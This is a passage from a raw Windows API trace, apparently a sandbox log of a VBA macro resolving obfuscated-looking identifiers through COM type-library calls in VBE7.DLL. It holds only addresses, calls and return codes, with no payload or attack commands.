szNameBuf="_B_var_Ncw4DABG", lHashVal=0x108a45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.710] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.710] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.710] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Ncw4DABG", lHashVal=0x108a45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.711] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.711] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.711] IUnknown:Release (This=0x665ba50) returned 0xd [0069.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870d3e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_Ncw4DABG") returned 16 [0069.711] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Ncw4DABG", lHashVal=0x108a45, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x44003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x44003400000000, pDummy=0x0) returned 0x0 [0069.711] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81a4a | out: _Dst=0x144ec0) returned 0x0 [0069.711] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jAAAQ1", lHashVal=0x1024d8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a76, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jAAAQ1") returned 7 [0069.711] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jAAAQ1", lHashVal=0x1024d8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a76, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jAAAQ1") returned 7 [0069.711] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jAAAQ1", lHashVal=0x1024d8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.711] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAAAQ1") returned 0x1024d8 [0069.711] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jAAAQ1" | out: _Dst="jAAAQ1") returned 0x0 [0069.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jAAAQ1") returned 7 [0069.711] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.711] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jAAAQ1", lHashVal=0x1024d8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.711] IUnknown:Release (This=0x665ba50) returned 0xd [0069.711] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.711] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jAAAQ1", lHashVal=0x1024d8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.711] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.711] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.711] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jAAAQ1", lHashVal=0x1024d8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.711] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.712] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.712] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jAAAQ1", lHashVal=0x1024d8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.712] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a76, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jAAAQ1") returned 7 [0069.712] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jAAAQ1", lHashVal=0x1024d8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.712] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.712] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81a76 | out: _Dst=0x67c2d40) returned 0x0 [0069.712] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jAAAQ1") returned 0x109f81 [0069.712] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jAAAQ1" | out: _Dst="_B_var_jAAAQ1") returned 0x0 [0069.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jAAAQ1") returned 14 [0069.712] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.712] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jAAAQ1", lHashVal=0x109f81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.712] IUnknown:Release (This=0x665ba50) returned 0xd [0069.712] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.712] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jAAAQ1", lHashVal=0x109f81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.712] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.712] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.712] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jAAAQ1", lHashVal=0x109f81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.712] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.712] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.712] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jAAAQ1", lHashVal=0x109f81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.712] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.712] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.712] IUnknown:Release (This=0x665ba50) returned 0xd [0069.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870d6e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_jAAAQ1") returned 14 [0069.712] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jAAAQ1", lHashVal=0x109f81, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0069.713] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81a76 | out: _Dst=0x144ec0) returned 0x0 [0069.713] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.713] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.713] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.713] IUnknown:Release (This=0x665ba50) returned 0xd [0069.713] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.713] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.713] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.713] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.713] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.713] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.713] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.713] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.713] IUnknown:Release (This=0x665ba50) returned 0xd [0069.713] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.713] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.713] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.713] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.713] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.713] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.713] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.713] IUnknown:Release (This=0x665ba50) returned 0xd [0069.714] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.714] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.714] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.714] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.714] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.714] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.714] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.714] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.714] IUnknown:Release (This=0x665ba50) returned 0xd [0069.714] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.714] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.714] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.714] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.714] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.714] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.714] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.714] IUnknown:Release (This=0x665ba50) returned 0xd [0069.714] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.714] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.714] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.714] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.714] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.714] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.715] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.715] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.715] IUnknown:Release (This=0x665ba50) returned 0xd [0069.715] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.715] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.715] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.715] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.715] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.715] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.715] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.715] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.715] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.715] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.715] IUnknown:Release (This=0x665ba50) returned 0xd [0069.715] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.715] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.715] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.715] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.715] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.715] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.715] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.715] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.715] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.716] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.716] IUnknown:Release (This=0x665ba50) returned 0xd [0069.716] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.716] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.716] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lQAX1X_A") returned 9 [0069.716] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lQAX1X_A", lHashVal=0x109a03, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lQAX1X_A") returned 9 [0069.716] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lQAX1X_A", lHashVal=0x109a03, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lQAX1X_A") returned 9 [0069.716] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lQAX1X_A", lHashVal=0x109a03, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.716] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lQAX1X_A") returned 0x109a03 [0069.716] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="lQAX1X_A" | out: _Dst="lQAX1X_A") returned 0x0 [0069.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="lQAX1X_A") returned 9 [0069.716] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.716] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lQAX1X_A", lHashVal=0x109a03, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.716] IUnknown:Release (This=0x665ba50) returned 0xd [0069.717] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.717] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lQAX1X_A", lHashVal=0x109a03, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.717] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.717] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.717] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lQAX1X_A", lHashVal=0x109a03, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.717] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.717] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.717] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lQAX1X_A", lHashVal=0x109a03, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.717] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lQAX1X_A") returned 9 [0069.717] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lQAX1X_A", lHashVal=0x109a03, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.717] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.717] _mbscpy_s (in: _Dst=0x67c2d40, 